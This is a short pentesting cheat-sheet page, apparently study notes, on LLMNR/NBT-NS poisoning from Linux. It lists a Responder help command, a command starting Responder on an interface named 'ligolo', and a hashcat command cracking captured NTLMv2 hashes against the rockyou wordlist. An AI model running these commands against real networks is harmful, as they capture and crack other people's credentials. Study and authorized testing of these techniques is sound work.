LLMNR/NBT-NS Poisoning - from Linux

Responder

  • Helping

responder -h
  • Iniciando o Responder com as configurações padrão

sudo responder -I ligolo
  • Quebrando um hash NTLMv2 com Hashcat

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

Last updated